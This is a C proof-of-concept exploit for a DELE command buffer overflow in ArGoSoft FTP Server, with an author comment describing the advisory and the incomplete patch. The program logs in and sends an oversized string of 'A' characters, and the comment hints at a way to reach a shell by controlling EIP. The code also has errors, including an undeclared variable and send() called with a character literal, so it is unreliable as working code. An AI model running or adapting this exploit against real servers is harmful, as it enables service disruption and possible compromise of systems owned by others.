/* ArGoSoft Ftp Server remote overflow exploit author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com package : ArGoSoft and prior advisory : packetstormsecurity.nl/0503-advisories/argosoftFTP1428.txt company address : argosoft.com the bug was found by a mate and reported to argosoft and they released another version . I downloaded the patched ver at www.argosoft.com and started to test the server . I saw that they worked with the vul but they didnt solve the mentioned DELE overflow . he did a wise job every long char which would be send to server it will write a nullbyte in the middle so we cant overwrite eip or other registers normally . The eip would be overwrite like 00410041 which seems useless . the server wont crash but it shows that it has beed overflowed . but the program maker doesnt think there are people who can do wiser job ! well there is a way to get shell.I just mention it.the code below is just show that the server is vuln. we can overwrite eip with a nullbyte without sending a null !!! so think there is a jmp call pop push register is around 004400E1 (for example) so we can directly jmp to anywhere we want . anyway if u want u can try . compiled with visual c++ 6 : cl argo.c greetz : LorD and NT of IHSTeam,Jamie of exploitdev,simorgh-ev,PiShi,redhat sIiiS and vahid,str0k (milw0rm),roberto (zone-h),securiteam,and other friends . Congratulate new iran irc server irc.iraneman.org #iran #ihs and new site www.ihsteam.com */ #include #include #include #include #pragma comment(lib, "ws2_32.lib") #define size 290 // enough for overflowing play with it for more result int main (int argc, char *argv[]){ unsigned char *recvbuf,*user,*pass; unsigned int rc,addr,sock ; struct sockaddr_in tcp; struct hostent *hp; WSADATA wsaData; char buffer[size]; unsigned short port; int i; if(argc < 5) { printf("\n-------- ArGoSoft Ftp remote exploit by c0d3r --------\n"); printf("-------- usage : argo.exe host port user pass --------\n"); printf("-------- eg: argo.exe 21 c0d3r secret --------\n\n"); exit(-1) ; } printf("\n-------- ArGoSoft Ftp remote exploit by c0d3r --------\n\n"); recvbuf = malloc(256); memset(recvbuf,0,256); //Creating exploit code printf("[+] building overflow string"); memset(buffer,0,size); buffer[0] = 'D';buffer[1] = 'E';buffer[2] = 'L';buffer[3]='E'; buffer[4]= 0x20; for(i = 5;i != 286;i++){ buffer[i] = 'A'; } //EO exploit code user = malloc(256); memset(user,0,256); pass = malloc(256); memset(pass,0,256); sprintf(user,"user %s\r\n",argv[3]); sprintf(pass,"pass %s\r\n",argv[4]); if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){ printf("[-] WSAStartup failed !\n"); exit(-1); } hp = gethostbyname(argv[1]); if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ){ printf("[-] unable to resolve %s\n",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock){ printf("[-] socket() error...\n"); exit(-1); } if (hp != NULL) memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); else tcp.sin_addr.s_addr = addr; if (hp) tcp.sin_family = hp->h_addrtype; else tcp.sin_family = AF_INET; port=atoi(argv[2]); tcp.sin_port=htons(port); printf("\n[+] attacking host %s\n" , argv[1]) ; Sleep(1000); printf("[+] packet size = %d byte\n" , sizeof(buffer)); rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); if(rc==0) { Sleep(1000) ; printf("[+] connected\n") ; rc2=recv(sock,recvbuf,256,0); printf("[+] sending username\n"); send(sock,user,strlen(user),0); send(sock,'\n',1,0); printf("[+] sending passworld\n"); Sleep(1000); send(sock,pass,strlen(pass),0); send(sock,'\n',1,0); Sleep(1000); send(sock,buffer,strlen(buffer),0); send(sock,'\n',1,0); printf("[+] string sent successfully check the main window for result\n"); } else { printf("[-] ArGo is not listening .... \n"); } shutdown(sock,1); closesocket(sock); }